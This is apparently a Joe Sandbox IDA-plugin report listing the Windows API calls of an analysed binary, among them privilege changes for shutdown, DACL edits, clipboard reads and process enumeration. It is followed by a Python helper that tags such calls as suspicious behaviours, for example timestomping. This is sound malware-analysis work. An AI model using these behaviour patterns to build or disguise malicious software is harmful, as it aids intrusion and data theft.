• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
• API String ID: 4115725249-188983378
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00434C12
• GetFileAttributesW.KERNEL32(?), ref: 00434C4F
• SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
• FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
• FindClose.KERNEL32(00000000), ref: 00434C88
• FindClose.KERNEL32(00000000), ref: 00434C9C
• FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
• SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
• SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
• FindClose.KERNEL32(00000000), ref: 00434D35
• FindClose.KERNEL32(00000000), ref: 00434D43
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Timetime$Sleep
• String ID: BUTTON
• API String ID: 4176159691-3405671355
APIs
• FindFirstFileW.KERNEL32(?,76228FB0,76228FB0,?,?,00000000), ref: 00442E40
• FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
• FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
• FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
• SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
• FindClose.KERNEL32(00000000), ref: 00442F80
  • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,76233220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
• FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
APIs
  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
  • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
  • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
• GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
• _memset.LIBCMT ref: 00445E61
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
• GetLengthSid.ADVAPI32(?), ref: 00445E92
• GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
• GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
• GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
• CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
• SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3490752873-0
                                                                                                                            APIs
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                            • _memset.LIBCMT ref: 0047AB7C
                                                                                                                            • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                            • _memset.LIBCMT ref: 0047ACCD
                                                                                                                            • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                            • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                            Strings
                                                                                                                            • NULL Pointer assignment, xrefs: 0047AD84
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
• String ID: NULL Pointer assignment
• API String ID: 1588287285-2785691316
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
• OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
• AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
• GetLastError.KERNEL32 ref: 00436504
• ExitWindowsEx.USER32(?,00000000), ref: 00436527
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
Strings
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
APIs
• __swprintf.LIBCMT ref: 00436162
• __swprintf.LIBCMT ref: 00436176
  • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
• __wcsicoll.LIBCMT ref: 00436185
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
• LoadResource.KERNEL32(?,00000000), ref: 004361AE
• LockResource.KERNEL32(00000000), ref: 004361B5
• FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
• LoadResource.KERNEL32(?,00000000), ref: 004361E4
• SizeofResource.KERNEL32(?,00000000), ref: 004361F0
• LockResource.KERNEL32(?), ref: 004361FD
Similarity
• API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
• String ID:
• API String ID: 2406429042-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D522
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
• GetLastError.KERNEL32 ref: 0045D59D
• SetErrorMode.KERNEL32(?), ref: 0045D629
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
• MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
• OleInitialize.OLE32(00000000), ref: 0047AE06
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _wcslen.LIBCMT ref: 0047AE18
• CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
• CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
• GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
Strings
Similarity
• API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
• String ID: HH
• API String ID: 1915432386-2761332787
Strings
Similarity
• API ID:
• String ID: DEFINE$`$h$h
• API String ID: 0-4194577831
APIs
• socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
• WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
• bind.WSOCK32(00000000,?,00000010), ref: 004648DA
• WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
• closesocket.WSOCK32(00000000), ref: 0046492D
Similarity
• API ID: ErrorLast$bindclosesocketsocket
• String ID:
• API String ID: 2609815416-0

APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
• Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
• Process32NextW.KERNEL32(00000000,?), ref: 00437075
• __wsplitpath.LIBCMT ref: 004370A5
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscat.LIBCMT ref: 004370BA
• __wcsicoll.LIBCMT ref: 004370C8
• CloseHandle.KERNEL32(00000000,?), ref: 00437105
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
• Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
• Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
• Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
• Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A

APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
• Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
• FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
• FindClose.KERNEL32(?,?,00000000), ref: 004522C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Find$File$CloseFirstNextSleep_wcslen
• String ID: *.*
• API String ID: 2693929171-438819550
• Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
• Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
• Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
• Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A

APIs
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
• String ID: HH
• API String ID: 589737431-2761332787
• Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
• Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
• Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
• Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA

APIs
• __wcsicoll.LIBCMT ref: 0043643C
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
• __wcsicoll.LIBCMT ref: 00436466
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
• Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
• Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
• Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD

APIs
  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
• WSAGetLastError.WSOCK32(00000000), ref: 00474233
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
• Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
• Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
• Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D

APIs
• GetCursorPos.USER32(004A83D8), ref: 0045636A
• ScreenToClient.USER32(004A83D8,?), ref: 0045638A
• GetAsyncKeyState.USER32(?), ref: 004563D0
• GetAsyncKeyState.USER32(?), ref: 004563DC
• GetWindowLongW.USER32(?,000000F0), ref: 00456430
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
• Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
• Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
• Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
• Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A

APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• IsWindowVisible.USER32 ref: 00477314
• IsWindowEnabled.USER32 ref: 00477324
• GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
• IsIconic.USER32 ref: 0047733F
• IsZoomed.USER32 ref: 0047734D
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
• Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
• Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
• Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
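The per-function records in this section are raw API listings from the Joe Sandbox IDA plugin. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses the plugin's `• Name.MODULE(args), ref: addr` bullets (the sample input is copied from the records above and from the CreateFileW/SetFileTime record that follows) into structured calls, decodes the constant arguments the plugin prints as hex (clipboard formats, the `mouse_event` flag word, the `socket` family/type/protocol triple, the `CreateFileW` access mask and creation disposition) and maps call combinations to behaviour tags. The record labels, tag names and rule set are this example's own choices; the numeric constants are the public Win32 and Winsock values.

```python
"""Added example: parse Joe Sandbox IDA-plugin "APIs" bullets and tag behaviours."""
import re
from dataclasses import dataclass

# Constructed input: "APIs" bullets copied from five function records of this
# report, keyed by a label of this example's choosing (behaviour + call-site address).
SAMPLE_RECORDS = {
    "proc_enum_00437043": """\
• CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
• Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
• Process32NextW.KERNEL32(00000000,?), ref: 00437075
• __wsplitpath.LIBCMT ref: 004370A5
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscat.LIBCMT ref: 004370BA
• __wcsicoll.LIBCMT ref: 004370C8
• CloseHandle.KERNEL32(00000000,?), ref: 00437105""",
    "clipboard_0046C635": """\
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• CloseClipboard.USER32 ref: 0046C866""",
    "mouse_0043643C": "• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452",
    "socket_00474213": """\
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
• WSAGetLastError.WSOCK32(00000000), ref: 00474233""",
    "filetime_00436D4F": """\
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,76233220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
• SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93""",
}

# One bullet: optional "Part of subcall function XXXX:" prefix, Name.MODULE, optional
# "(args)", then "ref: <call-site address>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple    # hex arguments decoded to int; None where the plugin printed "?"
    ref: str       # call-site address as printed
    subcall: bool  # True for "Part of subcall function" lines


def parse_record(text: str) -> list[Call]:
    """Parse one function's APIs block; lines that are not call bullets are skipped."""
    calls = []
    for line in text.splitlines():
        if m := CALL_RE.match(line):
            raw = m["args"]
            args = tuple(None if a.strip() == "?" else int(a, 16) for a in raw.split(",")) if raw else ()
            calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"] is not None))
    return calls


# Public Win32 / Winsock constants used to decode the printed arguments.
GENERIC_WRITE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS = 0x40000000, 3, 0x02000000
CF_NAMES = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}
MOUSEEVENTF_WHEEL = 0x0800
AF_INET, SOCK_DGRAM, IPPROTO_UDP = 2, 2, 17
SET_RULES = [  # every API in the set must appear in the function; tag names are this example's own
    ({"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}, "process-enumeration"),
    ({"Process32NextW", "__wcsicoll"}, "process-name-match"),  # case-insensitive compare of the name
    ({"FindFirstFileW", "FindNextFileW"}, "directory-walk"),
    ({"GetCursorPos", "GetAsyncKeyState"}, "input-state-poll"),
    ({"GetForegroundWindow", "IsWindowVisible"}, "foreground-window-check"),
]


def classify(calls: list[Call]) -> list[str]:
    """Behaviour tags for one function, in rule order, without duplicates."""
    names = {c.api for c in calls}
    tags = [tag for apis, tag in SET_RULES if apis <= names]
    for c in calls:
        a = c.args
        if c.api == "GetClipboardData" and a and a[0] is not None:
            tags.append("clipboard-read:" + CF_NAMES.get(a[0], hex(a[0])))
        elif c.api == "mouse_event" and a and a[0] and a[0] & MOUSEEVENTF_WHEEL:
            tags.append("synthetic-mouse-wheel")
        elif c.api == "socket" and a[:3] == (AF_INET, SOCK_DGRAM, IPPROTO_UDP):
            tags.append("udp-socket")
        elif c.api == "CreateFileW" and len(a) >= 6 and "SetFileTime" in names:
            access, disp, flags = a[1], a[4], a[5]
            # Existing file opened for write, then SetFileTime: the pattern to check for timestomping.
            if access is not None and access & GENERIC_WRITE and disp == OPEN_EXISTING:
                tags.append("set-file-time-on-existing-file")
                if flags is not None and flags & FILE_FLAG_BACKUP_SEMANTICS:
                    tags.append("backup-semantics")
    return list(dict.fromkeys(tags))


def triage(records: dict[str, str]) -> dict[str, list[str]]:
    return {name: classify(parse_record(text)) for name, text in records.items()}


if __name__ == "__main__":
    for name, tags in triage(SAMPLE_RECORDS).items():
        print(f"{name:20} {', '.join(tags) or '-'}")
```

Run it with `python3` to print one tag line per record. To apply it to another report, paste each function's APIs block in as a string; the `?` placeholders the plugin prints for unresolved arguments become `None`, so rules that need a concrete value skip them instead of misfiring. Arguments are compared exactly as printed, so a value such as `000000F0` in the `GetWindowLongW` record is not sign-extended by this parser.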
                                                                                                                            APIs
